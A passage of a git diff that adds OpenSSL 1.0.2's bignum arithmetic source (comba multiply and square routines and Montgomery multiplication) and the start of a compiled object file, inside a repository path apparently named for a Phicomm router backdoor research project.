+ * sqr_add_c2(a,i,c0,c1,c2) -- c+=2*a[i]*a[j] for three word number
+ * c=(c2,c1,c0)
+ */
+
+# ifdef BN_LLONG
+/*
+ * Keep in mind that additions to multiplication result can not
+ * overflow, because its high half cannot be all-ones.
+ */
+#  define mul_add_c(a,b,c0,c1,c2)       do {    \
+        BN_ULONG hi;                            \
+        BN_ULLONG t = (BN_ULLONG)(a)*(b);       \
+        t += c0;                /* no carry */  \
+        c0 = (BN_ULONG)Lw(t);                   \
+        hi = (BN_ULONG)Hw(t);                   \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        } while(0)
+
+#  define mul_add_c2(a,b,c0,c1,c2)      do {    \
+        BN_ULONG hi;                            \
+        BN_ULLONG t = (BN_ULLONG)(a)*(b);       \
+        BN_ULLONG tt = t+c0;    /* no carry */  \
+        c0 = (BN_ULONG)Lw(tt);                  \
+        hi = (BN_ULONG)Hw(tt);                  \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        t += c0;                /* no carry */  \
+        c0 = (BN_ULONG)Lw(t);                   \
+        hi = (BN_ULONG)Hw(t);                   \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        } while(0)
+
+#  define sqr_add_c(a,i,c0,c1,c2)       do {    \
+        BN_ULONG hi;                            \
+        BN_ULLONG t = (BN_ULLONG)a[i]*a[i];     \
+        t += c0;                /* no carry */  \
+        c0 = (BN_ULONG)Lw(t);                   \
+        hi = (BN_ULONG)Hw(t);                   \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        } while(0)
+
+#  define sqr_add_c2(a,i,j,c0,c1,c2) \
+        mul_add_c2((a)[i],(a)[j],c0,c1,c2)
+
+# elif defined(BN_UMULT_LOHI)
+/*
+ * Keep in mind that additions to hi can not overflow, because
+ * the high word of a multiplication result cannot be all-ones.
+ */
+#  define mul_add_c(a,b,c0,c1,c2)       do {    \
+        BN_ULONG ta = (a), tb = (b);            \
+        BN_ULONG lo, hi;                        \
+        BN_UMULT_LOHI(lo,hi,ta,tb);             \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define mul_add_c2(a,b,c0,c1,c2)      do {    \
+        BN_ULONG ta = (a), tb = (b);            \
+        BN_ULONG lo, hi, tt;                    \
+        BN_UMULT_LOHI(lo,hi,ta,tb);             \
+        c0 += lo; tt = hi+((c0<lo)?1:0);        \
+        c1 += tt; c2 += (c1<tt)?1:0;            \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define sqr_add_c(a,i,c0,c1,c2)       do {    \
+        BN_ULONG ta = (a)[i];                   \
+        BN_ULONG lo, hi;                        \
+        BN_UMULT_LOHI(lo,hi,ta,ta);             \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define sqr_add_c2(a,i,j,c0,c1,c2)    \
+        mul_add_c2((a)[i],(a)[j],c0,c1,c2)
+
+# elif defined(BN_UMULT_HIGH)
+/*
+ * Keep in mind that additions to hi can not overflow, because
+ * the high word of a multiplication result cannot be all-ones.
+ */
+#  define mul_add_c(a,b,c0,c1,c2)       do {    \
+        BN_ULONG ta = (a), tb = (b);            \
+        BN_ULONG lo = ta * tb;                  \
+        BN_ULONG hi = BN_UMULT_HIGH(ta,tb);     \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define mul_add_c2(a,b,c0,c1,c2)      do {    \
+        BN_ULONG ta = (a), tb = (b), tt;        \
+        BN_ULONG lo = ta * tb;                  \
+        BN_ULONG hi = BN_UMULT_HIGH(ta,tb);     \
+        c0 += lo; tt = hi + ((c0<lo)?1:0);      \
+        c1 += tt; c2 += (c1<tt)?1:0;            \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define sqr_add_c(a,i,c0,c1,c2)       do {    \
+        BN_ULONG ta = (a)[i];                   \
+        BN_ULONG lo = ta * ta;                  \
+        BN_ULONG hi = BN_UMULT_HIGH(ta,ta);     \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define sqr_add_c2(a,i,j,c0,c1,c2)      \
+        mul_add_c2((a)[i],(a)[j],c0,c1,c2)
+
+# else                          /* !BN_LLONG */
+/*
+ * Keep in mind that additions to hi can not overflow, because
+ * the high word of a multiplication result cannot be all-ones.
+ */
+#  define mul_add_c(a,b,c0,c1,c2)       do {    \
+        BN_ULONG lo = LBITS(a), hi = HBITS(a);  \
+        BN_ULONG bl = LBITS(b), bh = HBITS(b);  \
+        mul64(lo,hi,bl,bh);                     \
+        c0 = (c0+lo)&BN_MASK2; if (c0<lo) hi++; \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        } while(0)
+
+#  define mul_add_c2(a,b,c0,c1,c2)      do {    \
+        BN_ULONG tt;                            \
+        BN_ULONG lo = LBITS(a), hi = HBITS(a);  \
+        BN_ULONG bl = LBITS(b), bh = HBITS(b);  \
+        mul64(lo,hi,bl,bh);                     \
+        tt = hi;                                \
+        c0 = (c0+lo)&BN_MASK2; if (c0<lo) tt++; \
+        c1 = (c1+tt)&BN_MASK2; if (c1<tt) c2++; \
+        c0 = (c0+lo)&BN_MASK2; if (c0<lo) hi++; \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        } while(0)
+
+#  define sqr_add_c(a,i,c0,c1,c2)       do {    \
+        BN_ULONG lo, hi;                        \
+        sqr64(lo,hi,(a)[i]);                    \
+        c0 = (c0+lo)&BN_MASK2; if (c0<lo) hi++; \
+        c1 = (c1+hi)&BN_MASK2; if (c1<hi) c2++; \
+        } while(0)
+
+#  define sqr_add_c2(a,i,j,c0,c1,c2) \
+        mul_add_c2((a)[i],(a)[j],c0,c1,c2)
+# endif                         /* !BN_LLONG */
+
+void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    mul_add_c(a[0], b[0], c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    mul_add_c(a[0], b[1], c2, c3, c1);
+    mul_add_c(a[1], b[0], c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    mul_add_c(a[2], b[0], c3, c1, c2);
+    mul_add_c(a[1], b[1], c3, c1, c2);
+    mul_add_c(a[0], b[2], c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    mul_add_c(a[0], b[3], c1, c2, c3);
+    mul_add_c(a[1], b[2], c1, c2, c3);
+    mul_add_c(a[2], b[1], c1, c2, c3);
+    mul_add_c(a[3], b[0], c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    mul_add_c(a[4], b[0], c2, c3, c1);
+    mul_add_c(a[3], b[1], c2, c3, c1);
+    mul_add_c(a[2], b[2], c2, c3, c1);
+    mul_add_c(a[1], b[3], c2, c3, c1);
+    mul_add_c(a[0], b[4], c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    mul_add_c(a[0], b[5], c3, c1, c2);
+    mul_add_c(a[1], b[4], c3, c1, c2);
+    mul_add_c(a[2], b[3], c3, c1, c2);
+    mul_add_c(a[3], b[2], c3, c1, c2);
+    mul_add_c(a[4], b[1], c3, c1, c2);
+    mul_add_c(a[5], b[0], c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    mul_add_c(a[6], b[0], c1, c2, c3);
+    mul_add_c(a[5], b[1], c1, c2, c3);
+    mul_add_c(a[4], b[2], c1, c2, c3);
+    mul_add_c(a[3], b[3], c1, c2, c3);
+    mul_add_c(a[2], b[4], c1, c2, c3);
+    mul_add_c(a[1], b[5], c1, c2, c3);
+    mul_add_c(a[0], b[6], c1, c2, c3);
+    r[6] = c1;
+    c1 = 0;
+    mul_add_c(a[0], b[7], c2, c3, c1);
+    mul_add_c(a[1], b[6], c2, c3, c1);
+    mul_add_c(a[2], b[5], c2, c3, c1);
+    mul_add_c(a[3], b[4], c2, c3, c1);
+    mul_add_c(a[4], b[3], c2, c3, c1);
+    mul_add_c(a[5], b[2], c2, c3, c1);
+    mul_add_c(a[6], b[1], c2, c3, c1);
+    mul_add_c(a[7], b[0], c2, c3, c1);
+    r[7] = c2;
+    c2 = 0;
+    mul_add_c(a[7], b[1], c3, c1, c2);
+    mul_add_c(a[6], b[2], c3, c1, c2);
+    mul_add_c(a[5], b[3], c3, c1, c2);
+    mul_add_c(a[4], b[4], c3, c1, c2);
+    mul_add_c(a[3], b[5], c3, c1, c2);
+    mul_add_c(a[2], b[6], c3, c1, c2);
+    mul_add_c(a[1], b[7], c3, c1, c2);
+    r[8] = c3;
+    c3 = 0;
+    mul_add_c(a[2], b[7], c1, c2, c3);
+    mul_add_c(a[3], b[6], c1, c2, c3);
+    mul_add_c(a[4], b[5], c1, c2, c3);
+    mul_add_c(a[5], b[4], c1, c2, c3);
+    mul_add_c(a[6], b[3], c1, c2, c3);
+    mul_add_c(a[7], b[2], c1, c2, c3);
+    r[9] = c1;
+    c1 = 0;
+    mul_add_c(a[7], b[3], c2, c3, c1);
+    mul_add_c(a[6], b[4], c2, c3, c1);
+    mul_add_c(a[5], b[5], c2, c3, c1);
+    mul_add_c(a[4], b[6], c2, c3, c1);
+    mul_add_c(a[3], b[7], c2, c3, c1);
+    r[10] = c2;
+    c2 = 0;
+    mul_add_c(a[4], b[7], c3, c1, c2);
+    mul_add_c(a[5], b[6], c3, c1, c2);
+    mul_add_c(a[6], b[5], c3, c1, c2);
+    mul_add_c(a[7], b[4], c3, c1, c2);
+    r[11] = c3;
+    c3 = 0;
+    mul_add_c(a[7], b[5], c1, c2, c3);
+    mul_add_c(a[6], b[6], c1, c2, c3);
+    mul_add_c(a[5], b[7], c1, c2, c3);
+    r[12] = c1;
+    c1 = 0;
+    mul_add_c(a[6], b[7], c2, c3, c1);
+    mul_add_c(a[7], b[6], c2, c3, c1);
+    r[13] = c2;
+    c2 = 0;
+    mul_add_c(a[7], b[7], c3, c1, c2);
+    r[14] = c3;
+    r[15] = c1;
+}
+
+void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    mul_add_c(a[0], b[0], c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    mul_add_c(a[0], b[1], c2, c3, c1);
+    mul_add_c(a[1], b[0], c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    mul_add_c(a[2], b[0], c3, c1, c2);
+    mul_add_c(a[1], b[1], c3, c1, c2);
+    mul_add_c(a[0], b[2], c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    mul_add_c(a[0], b[3], c1, c2, c3);
+    mul_add_c(a[1], b[2], c1, c2, c3);
+    mul_add_c(a[2], b[1], c1, c2, c3);
+    mul_add_c(a[3], b[0], c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    mul_add_c(a[3], b[1], c2, c3, c1);
+    mul_add_c(a[2], b[2], c2, c3, c1);
+    mul_add_c(a[1], b[3], c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    mul_add_c(a[2], b[3], c3, c1, c2);
+    mul_add_c(a[3], b[2], c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    mul_add_c(a[3], b[3], c1, c2, c3);
+    r[6] = c1;
+    r[7] = c2;
+}
+
+void bn_sqr_comba8(BN_ULONG *r, const BN_ULONG *a)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    sqr_add_c(a, 0, c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 1, 0, c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    sqr_add_c(a, 1, c3, c1, c2);
+    sqr_add_c2(a, 2, 0, c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    sqr_add_c2(a, 3, 0, c1, c2, c3);
+    sqr_add_c2(a, 2, 1, c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    sqr_add_c(a, 2, c2, c3, c1);
+    sqr_add_c2(a, 3, 1, c2, c3, c1);
+    sqr_add_c2(a, 4, 0, c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    sqr_add_c2(a, 5, 0, c3, c1, c2);
+    sqr_add_c2(a, 4, 1, c3, c1, c2);
+    sqr_add_c2(a, 3, 2, c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    sqr_add_c(a, 3, c1, c2, c3);
+    sqr_add_c2(a, 4, 2, c1, c2, c3);
+    sqr_add_c2(a, 5, 1, c1, c2, c3);
+    sqr_add_c2(a, 6, 0, c1, c2, c3);
+    r[6] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 7, 0, c2, c3, c1);
+    sqr_add_c2(a, 6, 1, c2, c3, c1);
+    sqr_add_c2(a, 5, 2, c2, c3, c1);
+    sqr_add_c2(a, 4, 3, c2, c3, c1);
+    r[7] = c2;
+    c2 = 0;
+    sqr_add_c(a, 4, c3, c1, c2);
+    sqr_add_c2(a, 5, 3, c3, c1, c2);
+    sqr_add_c2(a, 6, 2, c3, c1, c2);
+    sqr_add_c2(a, 7, 1, c3, c1, c2);
+    r[8] = c3;
+    c3 = 0;
+    sqr_add_c2(a, 7, 2, c1, c2, c3);
+    sqr_add_c2(a, 6, 3, c1, c2, c3);
+    sqr_add_c2(a, 5, 4, c1, c2, c3);
+    r[9] = c1;
+    c1 = 0;
+    sqr_add_c(a, 5, c2, c3, c1);
+    sqr_add_c2(a, 6, 4, c2, c3, c1);
+    sqr_add_c2(a, 7, 3, c2, c3, c1);
+    r[10] = c2;
+    c2 = 0;
+    sqr_add_c2(a, 7, 4, c3, c1, c2);
+    sqr_add_c2(a, 6, 5, c3, c1, c2);
+    r[11] = c3;
+    c3 = 0;
+    sqr_add_c(a, 6, c1, c2, c3);
+    sqr_add_c2(a, 7, 5, c1, c2, c3);
+    r[12] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 7, 6, c2, c3, c1);
+    r[13] = c2;
+    c2 = 0;
+    sqr_add_c(a, 7, c3, c1, c2);
+    r[14] = c3;
+    r[15] = c1;
+}
+
+void bn_sqr_comba4(BN_ULONG *r, const BN_ULONG *a)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    sqr_add_c(a, 0, c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 1, 0, c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    sqr_add_c(a, 1, c3, c1, c2);
+    sqr_add_c2(a, 2, 0, c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    sqr_add_c2(a, 3, 0, c1, c2, c3);
+    sqr_add_c2(a, 2, 1, c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    sqr_add_c(a, 2, c2, c3, c1);
+    sqr_add_c2(a, 3, 1, c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    sqr_add_c2(a, 3, 2, c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    sqr_add_c(a, 3, c1, c2, c3);
+    r[6] = c1;
+    r[7] = c2;
+}
+
+# ifdef OPENSSL_NO_ASM
+#  ifdef OPENSSL_BN_ASM_MONT
+#   include <alloca.h>
+/*
+ * This is essentially reference implementation, which may or may not
+ * result in performance improvement. E.g. on IA-32 this routine was
+ * observed to give 40% faster rsa1024 private key operations and 10%
+ * faster rsa4096 ones, while on AMD64 it improves rsa1024 sign only
+ * by 10% and *worsens* rsa4096 sign by 15%. Once again, it's a
+ * reference implementation, one to be used as starting point for
+ * platform-specific assembler. Mentioned numbers apply to compiler
+ * generated code compiled with and without -DOPENSSL_BN_ASM_MONT and
+ * can vary not only from platform to platform, but even for compiler
+ * versions. Assembler vs. assembler improvement coefficients can
+ * [and are known to] differ and are to be documented elsewhere.
+ */
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0p, int num)
+{
+    BN_ULONG c0, c1, ml, *tp, n0;
+#   ifdef mul64
+    BN_ULONG mh;
+#   endif
+    volatile BN_ULONG *vp;
+    int i = 0, j;
+
+#   if 0                        /* template for platform-specific
+                                 * implementation */
+    if (ap == bp)
+        return bn_sqr_mont(rp, ap, np, n0p, num);
+#   endif
+    vp = tp = alloca((num + 2) * sizeof(BN_ULONG));
+
+    n0 = *n0p;
+
+    c0 = 0;
+    ml = bp[0];
+#   ifdef mul64
+    mh = HBITS(ml);
+    ml = LBITS(ml);
+    for (j = 0; j < num; ++j)
+        mul(tp[j], ap[j], ml, mh, c0);
+#   else
+    for (j = 0; j < num; ++j)
+        mul(tp[j], ap[j], ml, c0);
+#   endif
+
+    tp[num] = c0;
+    tp[num + 1] = 0;
+    goto enter;
+
+    for (i = 0; i < num; i++) {
+        c0 = 0;
+        ml = bp[i];
+#   ifdef mul64
+        mh = HBITS(ml);
+        ml = LBITS(ml);
+        for (j = 0; j < num; ++j)
+            mul_add(tp[j], ap[j], ml, mh, c0);
+#   else
+        for (j = 0; j < num; ++j)
+            mul_add(tp[j], ap[j], ml, c0);
+#   endif
+        c1 = (tp[num] + c0) & BN_MASK2;
+        tp[num] = c1;
+        tp[num + 1] = (c1 < c0 ? 1 : 0);
+ enter:
+        c1 = tp[0];
+        ml = (c1 * n0) & BN_MASK2;
+        c0 = 0;
+#   ifdef mul64
+        mh = HBITS(ml);
+        ml = LBITS(ml);
+        mul_add(c1, np[0], ml, mh, c0);
+#   else
+        mul_add(c1, ml, np[0], c0);
+#   endif
+        for (j = 1; j < num; j++) {
+            c1 = tp[j];
+#   ifdef mul64
+            mul_add(c1, np[j], ml, mh, c0);
+#   else
+            mul_add(c1, ml, np[j], c0);
+#   endif
+            tp[j - 1] = c1 & BN_MASK2;
+        }
+        c1 = (tp[num] + c0) & BN_MASK2;
+        tp[num - 1] = c1;
+        tp[num] = tp[num + 1] + (c1 < c0 ? 1 : 0);
+    }
+
+    if (tp[num] != 0 || tp[num - 1] >= np[num - 1]) {
+        c0 = bn_sub_words(rp, tp, np, num);
+        if (tp[num] != 0 || c0 == 0) {
+            for (i = 0; i < num + 2; i++)
+                vp[i] = 0;
+            return 1;
+        }
+    }
+    for (i = 0; i < num; i++)
+        rp[i] = tp[i], vp[i] = 0;
+    vp[num] = 0;
+    vp[num + 1] = 0;
+    return 1;
+}
+#  else
+/*
+ * Return value of 0 indicates that multiplication/convolution was not
+ * performed to signal the caller to fall down to alternative/original
+ * code-path.
+ */
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0, int num)
+{
+    return 0;
+}
+#  endif                        /* OPENSSL_BN_ASM_MONT */
+# endif
+
+#else                           /* !BN_MUL_COMBA */
+
+/* hmm... is it faster just to do a multiply? */
+# undef bn_sqr_comba4
+void bn_sqr_comba4(BN_ULONG *r, const BN_ULONG *a)
+{
+    BN_ULONG t[8];
+    bn_sqr_normal(r, a, 4, t);
+}
+
+# undef bn_sqr_comba8
+void bn_sqr_comba8(BN_ULONG *r, const BN_ULONG *a)
+{
+    BN_ULONG t[16];
+    bn_sqr_normal(r, a, 8, t);
+}
+
+void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+{
+    r[4] = bn_mul_words(&(r[0]), a, 4, b[0]);
+    r[5] = bn_mul_add_words(&(r[1]), a, 4, b[1]);
+    r[6] = bn_mul_add_words(&(r[2]), a, 4, b[2]);
+    r[7] = bn_mul_add_words(&(r[3]), a, 4, b[3]);
+}
+
+void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+{
+    r[8] = bn_mul_words(&(r[0]), a, 8, b[0]);
+    r[9] = bn_mul_add_words(&(r[1]), a, 8, b[1]);
+    r[10] = bn_mul_add_words(&(r[2]), a, 8, b[2]);
+    r[11] = bn_mul_add_words(&(r[3]), a, 8, b[3]);
+    r[12] = bn_mul_add_words(&(r[4]), a, 8, b[4]);
+    r[13] = bn_mul_add_words(&(r[5]), a, 8, b[5]);
+    r[14] = bn_mul_add_words(&(r[6]), a, 8, b[6]);
+    r[15] = bn_mul_add_words(&(r[7]), a, 8, b[7]);
+}
+
+# ifdef OPENSSL_NO_ASM
+#  ifdef OPENSSL_BN_ASM_MONT
+#   include <alloca.h>
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0p, int num)
+{
+    BN_ULONG c0, c1, *tp, n0 = *n0p;
+    volatile BN_ULONG *vp;
+    int i = 0, j;
+
+    vp = tp = alloca((num + 2) * sizeof(BN_ULONG));
+
+    for (i = 0; i <= num; i++)
+        tp[i] = 0;
+
+    for (i = 0; i < num; i++) {
+        c0 = bn_mul_add_words(tp, ap, num, bp[i]);
+        c1 = (tp[num] + c0) & BN_MASK2;
+        tp[num] = c1;
+        tp[num + 1] = (c1 < c0 ? 1 : 0);
+
+        c0 = bn_mul_add_words(tp, np, num, tp[0] * n0);
+        c1 = (tp[num] + c0) & BN_MASK2;
+        tp[num] = c1;
+        tp[num + 1] += (c1 < c0 ? 1 : 0);
+        for (j = 0; j <= num; j++)
+            tp[j] = tp[j + 1];
+    }
+
+    if (tp[num] != 0 || tp[num - 1] >= np[num - 1]) {
+        c0 = bn_sub_words(rp, tp, np, num);
+        if (tp[num] != 0 || c0 == 0) {
+            for (i = 0; i < num + 2; i++)
+                vp[i] = 0;
+            return 1;
+        }
+    }
+    for (i = 0; i < num; i++)
+        rp[i] = tp[i], vp[i] = 0;
+    vp[num] = 0;
+    vp[num + 1] = 0;
+    return 1;
+}
+#  else
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0, int num)
+{
+    return 0;
+}
+#  endif                        /* OPENSSL_BN_ASM_MONT */
+# endif
+
+#endif                          /* !BN_MUL_COMBA */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_asm.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_asm.o
new file mode 100644
index 0000000000000000000000000000000000000000..3c376b9b3730253fd368d3fc99d75a30f41934ca
GIT binary patch
literal 16800
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
